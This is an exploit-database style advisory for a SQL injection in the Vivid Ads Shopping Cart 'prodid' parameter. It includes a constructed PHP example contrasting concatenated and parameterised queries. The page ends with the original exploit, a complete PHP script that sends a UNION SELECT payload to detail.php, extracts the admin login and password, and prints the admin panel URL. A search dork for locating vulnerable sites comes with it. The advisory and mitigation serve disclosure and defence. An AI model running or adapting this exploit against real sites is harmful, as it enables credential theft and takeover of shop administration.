Vendor: Vivid Ads Shopping Cart
By: Pr0T3cT10n
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Vivid Ads Shopping Cart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Vivid Ads Shopping Cart (prodid) Remote SQL Injection

This is a remote SQL injection vulnerability in Vivid Ads Shopping Cart that allows an attacker to extract admin details from the database. The code was written for educational purposes. The dork used for this exploit is 'Vivid Ads Shopping Cart'. The exploit is written in PHP and uses fsockopen to connect to the server and send a GET request to the detail.php page with a malicious payload in the prodid parameter. The payload is a union select statement that concatenates the login and password of the admin user. The response is then parsed to extract the admin details.

Mitigation:

Validate and filter all user input before it is used in a SQL query, and use parameterized queries so that input is bound as data and never parsed as part of the SQL statement.
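The two mitigations above, shown side by side as an added example (not code from Vivid Ads Shopping Cart or from the exploit author). It assumes PHP with the pdo_sqlite extension; the `products` table, its columns, the function names and all sample rows are constructed for illustration, while `admin`, `login` and `password` are the names used in the request shown under Source.

```php
<?php
// Constructed in-memory database standing in for the shop's tables.
// "products" and its columns are assumed names; "admin", "login" and
// "password" are the names that appear in the request on this page.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec('CREATE TABLE admin (login TEXT, password TEXT)');
$db->exec("INSERT INTO products VALUES (1, 'Sample product')");
$db->exec("INSERT INTO admin VALUES ('constructed-admin', 'constructed-hash')");

// Weak pattern: the parameter is pasted into the SQL text, so whatever
// follows the number is parsed as part of the statement.
function find_product_concat(PDO $db, string $prodid): array
{
    $sql = 'SELECT id, name FROM products WHERE id = ' . $prodid;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: validate first, then bind the value as an integer.
function find_product_bound(PDO $db, string $prodid): array
{
    $id = filter_var($prodid, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // reject anything that is not a positive integer
    }
    $stmt = $db->prepare('SELECT id, name FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id, and a value shaped like the request on
// this page (two columns here instead of nineteen).
$inputs = ['1', '-1 union select login, password from admin'];
foreach ($inputs as $input) {
    printf("input: %s\n  concat: %s\n  bound:  %s\n", $input,
        json_encode(find_product_concat($db, $input)),
        json_encode(find_product_bound($db, $input)));
}
```

For the second input the concatenating function returns the row from `admin`, while the bound function returns an empty result because validation rejects the value before any query runs.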
Source

Exploit-DB raw data:

<?php
# Vivid Ads Shopping Cart (prodid) Remote SQL Injection
# Author: Pr0T3cT10n, pr0t3ct10n[at]gmail[dot]com
# This code was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
# Dork: "Vivid Ads Shopping Cart"
# nullbyte.org.il

$site = 'www.example.com'; # Site address
$path = '/path'; # Folder path
$contents = '';
$sock = fsockopen($site, 80, $errno, $errstr, 30);
if(!$sock){
    echo('( ' .$errstr.$errno. ' )'."\n");
}
else{
    $pack = "GET " .$path. "/detail.php?prodid=-1+union+select+1,2,3,concat(char(60),login,char(59),password,char(62)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin HTTP/1.1\r\n";
    $pack.= "Host: " .$site. "\r\n";
    $pack.= "Connection: Close\r\n\r\n";
    if(fwrite($sock, $pack)){
        while(!feof($sock)){
            $contents.= fgets($sock, 4096);
        }
        if(preg_match('/<(.*);(.*)>/', $contents, $matches)){
            echo('User: ' .$matches[1]. ';'."\n".'Pass: ' .$matches[2]. ';'."\n".'Admin login: http://' .$site.$path. '/admin/'."\n");
        }
        else{
            echo('Can\'t pull out admin details.'."\n");
        }
    }
    else{
        echo('Can\'t write socket.'."\n");
    }
}
?>